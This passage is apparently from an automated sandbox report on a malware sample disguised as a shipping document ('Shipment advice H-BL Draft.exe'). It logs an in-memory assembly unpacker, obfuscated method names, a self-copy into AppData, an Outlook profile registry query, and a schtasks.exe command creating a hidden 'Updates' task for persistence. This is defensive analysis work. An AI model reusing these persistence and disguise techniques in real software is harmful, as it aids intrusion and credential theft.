                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Shipment advice H-BL Draft.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Shipment advice H-BL Draft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.cs.Net Code: pjllxlRJ8W System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_016E5E00 pushad ; iretd 0_2_016E5E09
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07C60962 push DC05D175h; retf 0175h0_2_07C60A15
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07CC06F0 push esp; retf 07BAh0_2_07CC06FD
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 0_2_07CC22F8 push eax; retf 0_2_07CC2315
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_0280891E pushad ; iretd 13_2_0280891F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_02808C2F pushfd ; iretd 13_2_02808C30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_02808DDF push esp; iretd 13_2_02808DE0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06698909 push es; ret 13_2_06698920
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 14_2_07781520 push eax; retf 14_2_0778153D
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 14_2_0778043B push esp; retf 05A7h14_2_07780445
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_0148891E pushad ; iretd 18_2_0148891F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01488DDF push esp; iretd 18_2_01488DE0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_01488C2F pushfd ; iretd 18_2_01488C30
                    Source: Shipment advice H-BL Draft.exeStatic PE information: section name: .text entropy: 7.8833215409501465
                    Source: PrcGlGVKeUCXxg.exe.0.drStatic PE information: section name: .text entropy: 7.8833215409501465
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, ixWiGNeOm65DW7eSpN.csHigh entropy of concatenated method names: 'hjGRsGPqCl', 'owuRHLjDpF', 'q1ZZyFmTWm', 'J4qZhCMx0V', 'MB9Z6B6aMY', 'gK6ZIVSYhX', 'ebYZNdOawB', 'qVnZGiEFKc', 'Ql0ZJjnKMn', 'C7qZn2G4P7'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, GOqrpMYiJDTShMREFi.csHigh entropy of concatenated method names: 'qWdTU8m9Pt', 'vRmTuBu4G9', 'VROTyGOIqk', 'EaNThLvYyh', 'jEOT61SyYh', 'w2eTIZnbx2', 'Tc8TN9m8qZ', 'WMhTGlNKCx', 'LauTJliqrv', 'Ai0TnSyri1'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, gdNVcxURmsH25ySadH.csHigh entropy of concatenated method names: 'PWxWt23bKr', 'FunWQYXeJM', 'bnhWR5MNrI', 'x8KWje1VSX', 'w4nWgUB5Zs', 'agsRLDyHIg', 'DIoR8dDgR3', 'zE2R4mwOBm', 'THcRBcbTxK', 'ySURYbtT5w'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, wZgc7i4q9brRT2pZKI.csHigh entropy of concatenated method names: 'whYTwtu4NS', 'MWCTKxljOC', 'RRoTTVTqjP', 'lIkTbkxjWR', 'O9DTqJLgjH', 'tg0TdYIaOG', 'Dispose', 'jObfSASnib', 'zfDfQcbTi0', 'qNlfZFSLmV'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, ulbq95Xlxcu8p7KeyGb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HtQATCLh4b', 'FfVA3ZKo91', 'QF6Abf45d6', 'PmbAA0F170', 'G2KAq2JLWs', 'KdgA0Hhbvu', 'vXXAdg2uNY'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, KsMRxFrdbDbyaIENQ5.csHigh entropy of concatenated method names: 'xNyZ2pbc1C', 'o1LZcxyWqS', 'S2lZOfwDKu', 'hcIZrxJ7OJ', 'H7fZw2IuBl', 'OL1Z9tHivG', 'oQ7ZKv2qkn', 'b0GZfdT4QZ', 'Mq4ZTOp8s6', 'nI6Z3bPd88'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, naUIUlEG66hMKkCVK1.csHigh entropy of concatenated method names: 'ToString', 'ivI91pyCPu', 'rNf9uGow5O', 'Dne9yc9uZn', 'c1m9hB9EmD', 'xow96hUy2Y', 'hWS9I2v6yn', 'Stj9NAamw9', 'atT9Gs0rrs', 'nOi9JIa7FV'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, isFMQ2CQg9EPtseEDq.csHigh entropy of concatenated method names: 'yrAx8BenU', 'Gpq2tohR5', 'PiocPggTl', 'Uk6HCswlN', 'kMvrQx8B9', 'horeerTZO', 'Wd7wRINv9PtEmPgGiq', 'cUtHHY1lpVZgynQ2xi', 'Ky1fLTMoi', 'iUA3JiVDq'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.csHigh entropy of concatenated method names: 'oDA7tyc2GW', 'oJl7SQ8PN7', 'eot7QTbc0v', 'LV37ZhYI8W', 'S447RDni84', 'bsc7W7VMeb', 'pHN7j589dF', 'NmU7gpNuK8', 'MSy7iTkwvO', 'BIf7FKqdcs'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, C4mUUbO6hDslyPplLx.csHigh entropy of concatenated method names: 'M3gQk5nfaw', 'L0hQMPdF1K', 'qEKQEOLBHI', 'CKwQayxLjA', 'CQ8QLkVYf2', 'zNtQ8pYao6', 'bL6Q4jAtFE', 'aIsQBkd8Su', 'oF9QYEYZOm', 'bhPQ5YA0gu'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, q9fnjc5GYGvmhbZoiW.csHigh entropy of concatenated method names: 'HSX3ZOo1rM', 'VRL3R23frN', 'cC93WqMlFe', 'L9W3jMuDfV', 'qSq3TwEHdp', 'jgC3g9Eqj6', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, wt7q5lobhYgW243oOm.csHigh entropy of concatenated method names: 'k0SVOR1VSK', 'T1QVr7tpyJ', 'fcEVUTeIx2', 'W9SVuBsuj4', 'yhHVhkNTfa', 'DfxV6aaeql', 'hHsVNE0mSn', 'K1YVGiadEL', 'PWVVnPhjp4', 'WQ7V1F1sWX'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, XvYxlglRiOic6hbTcl.csHigh entropy of concatenated method names: 'JBcXj4mUUb', 'JhDXgslyPp', 'ldbXFDbyaI', 'SNQXv5WxWi', 'ceSXwpNZdN', 'ocxX9RmsH2', 'uWbPBYClg5TnrwgXcF', 'PwOV5rhZOw3hWpatPJ', 'sW23f50HDYi4H4ZftZ', 'cfdXXcVNxe'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, fQqeR9amxnwgk5W4Ox.csHigh entropy of concatenated method names: 'rklKFyRHZI', 'Ya3KvCsvgd', 'ToString', 'IsRKSOs3dj', 'dmDKQe62DO', 'ykQKZPcR4e', 'xcxKR56JhE', 'JpfKW03YXR', 'fgCKjnm3iE', 'nQ8KgrYBUY'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, wciwk9zEOG6uX91csF.csHigh entropy of concatenated method names: 'sqx3cHcMrB', 'j273Oicemd', 'MhN3r1tGkP', 'Dja3USOlI4', 'bNr3uxC4A2', 'E2K3huEeoq', 'P6936cROAI', 'hW93dv7YEs', 'ej73DNkkFO', 'Ybc3paq1hu'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, IPBBsTXXF8uETShpuYk.csHigh entropy of concatenated method names: 'LZV35YTZ3O', 'JKf3zbyDY2', 'wQobPadTtQ', 'kwSbXH7c9L', 'EQubCOFfZj', 'qtdb79PiM9', 'UTablBWWOg', 'WuTbtRR4nk', 'AhsbS7Rl5j', 'PRCbQDOkKg'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, hB07IUQyTvRe7o7MWA.csHigh entropy of concatenated method names: 'Dispose', 'trRXYT2pZK', 'pAwCuIk4s7', 'uYe2Enj6h1', 'KabX5CxUCW', 'AC1XzaWPwJ', 'ProcessDialogKey', 'GfuCPOqrpM', 'lJDCXTShMR', 'SFiCCK9fnj'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, Iw0uX58lMeHcnwybv3.csHigh entropy of concatenated method names: 'khGKBtsbvb', 'HeRK5KoCQZ', 'AWOfPnMYHF', 'SXDfX1imC6', 'L44K1J6uGV', 'ubAKm4ehc1', 'PeOKoXGHCC', 'JbAKkdG0vO', 'GblKMKh1yK', 'K4iKEqI2GB'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, SOukgNJWlMylIaVTis.csHigh entropy of concatenated method names: 'dGojDW4JtW', 'svkjpF6LjC', 'rj1jxyXWqv', 'FELj2bjnNt', 'twEjsLh0Wp', 'swnjckKvxR', 'QgLjHokDLh', 'P3tjOeLk36', 'tqFjrNQPeP', 'SsMjeOPldL'
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
